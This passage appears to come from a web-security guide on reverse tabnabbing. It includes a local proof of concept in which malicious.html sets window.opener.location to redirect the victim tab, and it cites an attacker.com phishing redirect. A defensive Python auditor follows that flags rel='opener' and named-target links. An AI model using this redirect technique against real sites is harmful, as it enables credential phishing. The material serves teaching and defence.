In a situation where an attacker can control the href argument of an <a tag with the attribute
A common way to abuse this behavior is to change the location of the original page via window.opener.location = https://attacker.com/victim.html to a page controlled by the attacker that looks like the original one, so it can imitate the login form of the original website and ask the user for credentials.
Link between parent and child pages when prevention attribute is not used:
Link between parent and child pages when prevention attribute is used:
Create the following pages in a folder and run a web server with python3 -m http.server. Then open http://127.0.0.1:8000/vulnerable.html, click on the link and note how the original website URL changes.
vulnerable.html

```html
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
```

malicious.html

```html
<!DOCTYPE html>
<html>
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
```

malicious_redir.html

```html
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
```
opener.closed: Returns a boolean value indicating whether a window has been closed or not.
opener.frames: Returns all iframe elements in the current window.
opener.length: Returns the number of iframe elements in the current window.
opener.opener: Returns a reference to the window that created the window.
opener.parent: Returns the parent window of the current window.
opener.self: Returns the current window.
opener.top: Returns the topmost browser window.
Prevention information is documented in the HTML5 Cheat Sheet.
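To find links like the one in vulnerable.html before they ship, the following Python script (an added example, not code from the original page or the cheat sheet) audits HTML for links and forms whose target opens a new browsing context and reports whether the opened page receives window.opener. The verdict names, the audit helper and the sample markup are constructed for illustration; the rule follows the HTML standard, where noopener/noreferrer always win and target="_blank" implies noopener unless rel="opener" is set.

```python
from html.parser import HTMLParser

# Targets that reuse an existing browsing context, so no opener link is created.
SAME_CONTEXT = {"", "_self", "_parent", "_top"}

class OpenerAudit(HTMLParser):
    """Collect links and forms whose target page can receive window.opener."""
    def __init__(self):
        super().__init__()
        self.findings = []  # (line, tag, url, verdict)

    def handle_starttag(self, tag, attrs):
        if tag not in ("a", "area", "form"):
            return
        attr = {k: v or "" for k, v in reversed(attrs)}  # first duplicate wins
        target = attr.get("target", "").strip().lower()
        if target in SAME_CONTEXT:
            return
        rel = set(attr.get("rel", "").lower().split())
        if rel & {"noopener", "noreferrer"}:
            verdict = "safe"             # opener is null in the opened page
        elif target == "_blank" and "opener" not in rel:
            verdict = "browser-default"  # safe only where _blank implies noopener
        else:
            verdict = "exposed"          # rel="opener" or a named target
        url = attr.get("href") or attr.get("action", "")
        self.findings.append((self.getpos()[0], tag, url, verdict))

def audit(html):
    parser = OpenerAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: the first link is the one from vulnerable.html.
SAMPLE = """<!DOCTYPE html>
<html><body>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">1</a>
<a href="https://example.com/a" target="_blank">2</a>
<a href="https://example.com/b" target="_blank" rel="noopener noreferrer">3</a>
<a href="https://example.com/c" target="report" rel="nofollow">4</a>
<a href="/local">5</a>
</body></html>"""

if __name__ == "__main__":
    for line, tag, url, verdict in audit(SAMPLE):
        print(f"line {line}: <{tag}> {url} -> {verdict}")
```

Treat "browser-default" as a finding when older browsers are in scope, and add rel="noopener" explicitly.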